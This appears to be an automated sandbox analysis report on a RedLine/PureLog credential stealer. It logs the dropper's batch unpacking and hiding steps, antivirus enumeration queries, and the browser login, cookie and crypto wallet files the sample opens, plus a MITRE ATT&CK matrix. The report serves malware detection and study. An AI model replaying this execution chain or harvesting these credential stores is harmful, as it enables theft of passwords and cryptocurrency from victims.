Source: in.exe, 0000000B.00000002.2145079467.0000000003D23000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: in.exe, 0000000B.00000002.2145079467.0000000003D23000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: in.exe, 0000000B.00000002.2145079467.0000000003CB2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: in.exe, 0000000B.00000002.2145079467.0000000003CB2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: in.exe, 0000000B.00000002.2145079467.0000000003CB2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: in.exe, 0000000B.00000002.2145079467.0000000003CB2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: in.exe, 0000000B.00000002.2145079467.0000000003D23000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: in.exe, 0000000B.00000002.2145079467.0000000003CB2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: in.exe, 0000000B.00000002.2145079467.0000000003CB2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: in.exe, 0000000B.00000002.2145079467.0000000003D23000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: in.exe, 0000000B.00000002.2145079467.0000000003D23000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: in.exe, 0000000B.00000002.2145079467.0000000003CB2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: in.exe, 0000000B.00000002.2145079467.0000000003D23000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: in.exe, 0000000B.00000002.2145079467.0000000003CB2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: in.exe, 0000000B.00000002.2145079467.0000000003CB2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: in.exe, 0000000B.00000002.2145079467.0000000003D23000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: in.exe, 0000000B.00000002.2145079467.0000000003CB2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: in.exe, 0000000B.00000002.2145079467.0000000003D23000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: in.exe, 0000000B.00000002.2145079467.0000000003D23000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: in.exe, 0000000B.00000002.2145079467.0000000003CB2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: in.exe, 0000000B.00000002.2145079467.0000000003D23000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: in.exe, 0000000B.00000002.2145079467.0000000003D23000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: in.exe, 0000000B.00000002.2145079467.0000000003D23000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: in.exe, 0000000B.00000002.2145079467.0000000003CB2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: in.exe, 0000000B.00000002.2145079467.0000000003CB2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: in.exe, 0000000B.00000002.2145079467.0000000003D23000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: in.exe, 0000000B.00000002.2145079467.0000000003CB2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: in.exe, 0000000B.00000002.2145079467.0000000003CB2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: in.exe, 0000000B.00000002.2145079467.0000000003CB2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: in.exe, 0000000B.00000002.2145079467.0000000003CB2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: in.exe, 0000000B.00000002.2145079467.0000000003CB2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: in.exe, 0000000B.00000002.2155247423.00000000052B9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: in.exe, 0000000B.00000002.2145079467.0000000003D23000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: in.exe, 0000000B.00000002.2145079467.0000000003CB2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: in.exe, 0000000B.00000002.2145079467.0000000003CB2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: in.exe, 0000000B.00000002.2145079467.0000000003D23000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: in.exe, 0000000B.00000002.2145079467.0000000003CB2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: in.exe, 0000000B.00000002.2145079467.0000000003CB2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: in.exe, 0000000B.00000002.2145079467.0000000003D23000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: in.exe, 0000000B.00000002.2145079467.0000000003CB2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: in.exe, 0000000B.00000002.2145079467.0000000003D23000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: in.exe, 0000000B.00000002.2145079467.0000000003CB2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: in.exe, 0000000B.00000002.2145079467.0000000003CB2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: in.exe, 0000000B.00000002.2145079467.0000000003D23000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: in.exe, 0000000B.00000002.2145079467.0000000003D23000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: in.exe, 0000000B.00000002.2145079467.0000000003D23000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: in.exe, 0000000B.00000002.2145079467.0000000003D23000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: in.exe, 0000000B.00000002.2145079467.0000000003D23000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: in.exe, 0000000B.00000002.2145079467.0000000003D23000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: in.exe, 0000000B.00000002.2145079467.0000000003D23000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: in.exe, 0000000B.00000002.2145079467.0000000003D23000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: in.exe, 0000000B.00000002.2145079467.0000000003CB2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: in.exe, 0000000B.00000002.2145079467.0000000003D23000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x

Source: C:\Users\user\AppData\Local\Temp\main\in.exe

Process information queried: ProcessInformation

Source: C:\Users\user\AppData\Local\Temp\main\in.exe

Code function: 11_2_00BFD07C LdrInitializeThunk,

11_2_00BFD07C

Source: C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exe

Code function: 0_2_00402665 LoadLibraryA,GetProcAddress,GetNativeSystemInfo,

0_2_00402665

Source: C:\Users\user\AppData\Local\Temp\main\in.exe

Process token adjusted: Debug

Source: C:\Users\user\AppData\Local\Temp\main\in.exe

Memory allocated: page read and write | page guard

Source: C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mode.com mode 65,10	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e file.zip -p324051139125346723019431074 -oextracted	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_4.zip -oextracted	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_3.zip -oextracted	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_2.zip -oextracted	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_1.zip -oextracted	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +H "in.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\in.exe "in.exe"	Jump to behavior

Source: C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exe

Code function: 0_2_00402744 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_00402744

Source: C:\Users\user\AppData\Local\Temp\main\7z.exe

Code function: 5_2_0049D670 cpuid

5_2_0049D670

Source: C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exe

Code function: GetLastError,GetLastError,wsprintfW,GetEnvironmentVariableW,GetEnvironmentVariableW,GetLastError,??2@YAPAXI@Z,GetEnvironmentVariableW,GetLastError,lstrcmpiW,??3@YAXPAX@Z,??3@YAXPAX@Z,SetLastError,lstrlenA,??2@YAPAXI@Z,??_U@YAPAXI@Z,GetLocaleInfoW,_wtol,MultiByteToWideChar,

0_2_0040247D

Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\main\in.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exe

Code function: 0_2_004039E7 lstrlenW,GetSystemTimeAsFileTime,GetFileAttributesW,memcpy,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,

0_2_004039E7

Source: C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exe

Code function: 0_2_00405BFC ?_set_new_handler@@YAP6AHI@ZP6AHI@Z@Z,GetVersionExW,GetCommandLineW,lstrlenW,wsprintfW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetModuleFileNameW,_wtol,??2@YAPAXI@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,wsprintfW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetCommandLineW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetCurrentProcess,SetProcessWorkingSetSize,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,CoInitialize,lstrlenW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,GetKeyState,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetFileAttributesW,??3@YAXPAX@Z,??3@YAXPAX@Z,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,SetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,SetCurrentDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,MessageBoxA,

0_2_00405BFC

Source: C:\Users\user\AppData\Local\Temp\main\in.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Yara detected PureLog Stealer

Source: C:\Users\user\AppData\Local\Temp\main\in.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

Source: Yara match	File source: 11.0.in.exe.420000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000000.2022612006.0000000000422000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\main\extracted\in.exe, type: DROPPED

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 11.0.in.exe.420000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000000.2022612006.0000000000422000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: in.exe PID: 5036, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\main\extracted\in.exe, type: DROPPED

Found many strings related to Crypto-Wallets (likely being stolen)

Source: in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ElectrumE#
Source: in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: JaxxE#
Source: in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ExodusE#
Source: in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: EthereumE#
Source: in.exe, 0000000B.00000000.2022612006.0000000000422000.00000002.00000001.01000000.00000007.sdmp	String found in binary or memory: set_UseMachineKeyStore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\main\in.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Temp\main\in.exe	File opened: C:\Users\user\AppData\Roaming\atomic\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\Cache\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\db\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\	Jump to behavior

Source: Yara match	File source: 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: in.exe PID: 5036, type: MEMORYSTR

Remote Access Functionality

Yara detected PureLog Stealer

Source: Yara match	File source: 11.0.in.exe.420000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000000.2022612006.0000000000422000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\main\extracted\in.exe, type: DROPPED

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 11.0.in.exe.420000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000000.2022612006.0000000000422000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: in.exe PID: 5036, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\main\extracted\in.exe, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	221 Windows Management Instrumentation	1 Scripting	1 DLL Side-Loading	1 Disable or Modify Tools	1 OS Credential Dumping	1 System Time Discovery	Remote Services	11 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	1 DLL Side-Loading	1 Access Token Manipulation	11 Deobfuscate/Decode Files or Information	11 Input Capture	4 File and Directory Discovery	Remote Desktop Protocol	3 Data from Local System	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	11 Process Injection	4 Obfuscated Files or Information	Security Account Manager	137 System Information Discovery	SMB/Windows Admin Shares	11 Input Capture	1 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Install Root Certificate	NTDS	221 Security Software Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	12 Software Packing	LSA Secrets	1 Process Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Timestomp	Cached Domain Credentials	241 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Masquerading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	241 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	1 Access Token Manipulation	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	11 Process Injection	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner
C:\Users\user\AppData\Local\Temp\main\extracted\in.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\main\7z.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\main\7z.exe	0%	ReversingLabs

Source	Detection	Scanner	Label
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/02/sc/sct	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk	0%	URL Reputation	safe
http://tempuri.org/Entity/Id14ResponseD	0%	URL Reputation	safe
http://tempuri.org/Entity/Id23ResponseD	0%	URL Reputation	safe
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary	0%	URL Reputation	safe
http://tempuri.org/Entity/Id12Response	0%	URL Reputation	safe
http://tempuri.org/	0%	URL Reputation	safe
http://tempuri.org/Entity/Id2Response	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1	0%	URL Reputation	safe
http://tempuri.org/Entity/Id21Response	0%	URL Reputation	safe
http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap	0%	URL Reputation	safe
http://tempuri.org/Entity/Id9	0%	URL Reputation	safe
http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID	0%	URL Reputation	safe
http://tempuri.org/Entity/Id8	0%	URL Reputation	safe
http://tempuri.org/Entity/Id6ResponseD	0%	URL Reputation	safe
http://tempuri.org/Entity/Id5	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare	0%	URL Reputation	safe
